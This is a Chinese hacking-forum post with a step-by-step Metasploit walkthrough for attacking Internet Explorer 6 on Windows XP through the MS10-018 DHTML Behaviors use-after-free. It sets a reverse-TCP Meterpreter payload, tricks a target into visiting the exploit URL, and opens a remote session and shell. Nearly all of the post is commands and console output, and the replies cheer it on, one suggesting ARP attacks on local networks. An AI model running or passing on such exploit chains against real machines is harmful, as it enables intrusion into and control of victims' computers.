切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
7. MSF进行一次浏览器攻击[复制链接]
发表于 2012-8-4 17:28:26 | 显示全部楼层 |!read_mode!
启动MSF 搜索漏洞:
我的是XP2 1 浏览器是IE6 所以:
  1. msf > search ie6

  2. Matching Modules
  3. ================

  4.    Name                                                       Disclosure Date  Rank     Description
  5.    ----                                                       ---------------  ----     -----------
  6.    exploit/windows/browser/adobe_flashplayer_avm              2011-03-15       good     Adobe Flash Player AVM Bytecode Verification Vulnerability
  7.    exploit/windows/browser/hp_loadrunner_addfile              2008-01-25       normal   Persits XUpload ActiveX AddFile Buffer Overflow
  8.    exploit/windows/browser/hp_loadrunner_addfolder            2007-12-25       good     HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
  9.    exploit/windows/browser/intrust_annotatex_add              2012-03-28       average  Quest InTrust Annotation Objects Uninitialized Pointer
  10.    exploit/windows/browser/ms06_013_createtextrange           2006-03-19       normal   Internet Explorer createTextRange() Code Execution
  11.    exploit/windows/browser/ms06_071_xml_core                  2006-10-10       normal   Internet Explorer XML Core Services HTTP Request Handling
  12.    exploit/windows/browser/ms07_017_ani_loadimage_chunksize   2007-03-28       great    Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
  13.    exploit/windows/browser/ms09_043_owc_htmlurl               2009-08-11       normal   Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
  14.    exploit/windows/browser/ms10_018_ie_behaviors              2010-03-09       good     Internet Explorer DHTML Behaviors Use After Free
  15.    exploit/windows/browser/nctaudiofile2_setformatlikesample  2007-01-24       normal   NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
  16.    exploit/windows/browser/realplayer_qcp                     2011-08-16       average  RealNetworks Realplayer QCP Parsing Heap Overflow
  17.    exploit/windows/browser/teechart_pro                       2011-08-11       normal   TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference
  18.    exploit/windows/browser/viscom_movieplayer_drawtext        2010-01-12       normal   Viscom Software Movie Player Pro SDK ActiveX 6.8
  19.    exploit/windows/browser/vlc_mms_bof                        2012-03-15       normal   VLC MMS Stream Handling Buffer Overflow
  20.    exploit/windows/fileformat/msworks_wkspictureinterface     2008-11-28       low      Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution


  21. msf >
复制代码
然后看Rank  GOOD代表成功率高
  1.    exploit/windows/browser/ms10_018_ie_behaviors              2010-03-09       good     Internet Explorer DHTML Behaviors Use After Free
复制代码
这个是GOOD 用这个:
进入漏洞模块
  1. msf > use exploit/windows/browser/ms10_018_ie_behaviors
  2. msf  exploit(ms10_018_ie_behaviors) >
复制代码
查看选项
  1. msf  exploit(ms10_018_ie_behaviors) > show options

  2. Module options (exploit/windows/browser/ms10_018_ie_behaviors):

  3.    Name        Current Setting  Required  Description
  4.    ----        ---------------  --------  -----------
  5.    SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  6.    SRVPORT     8080             yes       The local port to listen on.
  7.    SSL         false            no        Negotiate SSL for incoming connections
  8.    SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  9.    SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  10.    URIPATH                      no        The URI to use for this exploit (default is random)


  11. Exploit target:

  12.    Id  Name
  13.    --  ----
  14.    0   (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista


  15. msf  exploit(ms10_018_ie_behaviors) >
复制代码
写入URIPATH
  1. msf  exploit(ms10_018_ie_behaviors) > set URIPATH /1.fuck
  2. URIPATH => /1.fuck
复制代码
写入后门
  1. psf  exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/reverse_tcp
  2. PAYLOAD => windows/meterpreter/reverse_tcp
  3. msf  exploit(ms10_018_ie_behaviors) >
复制代码
配置后门
  1. msf  exploit(ms10_018_ie_behaviors) > set LHOST 5.5.5.5  //监听IP
  2. LHOST => 5.5.5.5
  3. msf  exploit(ms10_018_ie_behaviors) > set LPORT 5423   //监听端口
  4. LPORT => 5423
  5. msf  exploit(ms10_018_ie_behaviors) >
复制代码
执行
  1. msf  exploit(ms10_018_ie_behaviors) > exploit -j
  2. [*] Exploit running as background job.

  3. [*] Started reverse handler on 5.5.5.5:5423
  4. [*] Using URL: http://0.0.0.0:8080/1.fuck
  5. [*]  Local IP: http://5.5.5.5:8080/1.fuck
  6. [*] Server started.
  7. msf  exploit(ms10_018_ie_behaviors) >
复制代码
然后目标浏览  http://5.5.5.5:8080/1.fuck
中马 获得后门:
  1. msf  exploit(ms10_018_ie_behaviors) > [*] 5.5.5.3          ms10_018_ie_behaviors - Sending Internet Explorer DHTML Behaviors Use After Free (target: IE 6 SP0-SP2 (onclick))...
  2. [*] Sending stage (752128 bytes) to 5.5.5.3
  3. [*] Meterpreter session 1 opened (5.5.5.5:5423 -> 5.5.5.3:1049) at 2012-05-12 00:29:05 +0800
  4. [*] Session ID 1 (5.5.5.5:5423 -> 5.5.5.3:1049) processing InitialAutoRunScript 'migrate -f'
  5. [*] Current server process: Explorer.EXE (1536)
  6. [*] Spawning notepad.exe process to migrate to
  7. [+] Migrating to 1688
  8. [+] Successfully migrated to process
复制代码
查看绘画
  1. msf  exploit(ms10_018_ie_behaviors) > sessions

  2. Active sessions
  3. ===============

  4.   Id  Type                   Information                            Connection
  5.   --  ----                   -----------                            ----------
  6.   1   meterpreter x86/win32  DIS9TEAM-ECFCC8\brk @ DIS9TEAM-ECFCC8  5.5.5.5:5423 -> 5.5.5.3:1049 (5.5.5.3)
复制代码

链接会话
msf  exploit(ms10_018_ie_behaviors) > sessions -i 1
Starting interaction with 1...

meterpreter > shell


操千曲而后晓声,观千剑而后识器。
发表于 2014-8-16 20:38:14 | 显示全部楼层
好屌。。。
发表于 2014-11-19 10:52:58 | 显示全部楼层
arp+msf局域网杀手锏
发表于 2015-3-14 09:42:13 | 显示全部楼层
很牛逼的攻击
发表于 2015-9-29 16:52:07 | 显示全部楼层
很牛逼的攻击
发表于 2015-11-12 19:21:19 | 显示全部楼层
学习了!感谢楼主分享
发表于 2016-1-25 17:01:34 | 显示全部楼层
学习了!感谢楼主分享
发表于 2017-11-16 16:28:18 | 显示全部楼层
好好学习,谢谢

代码区

GMT+8, 2020-9-29 08:16

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部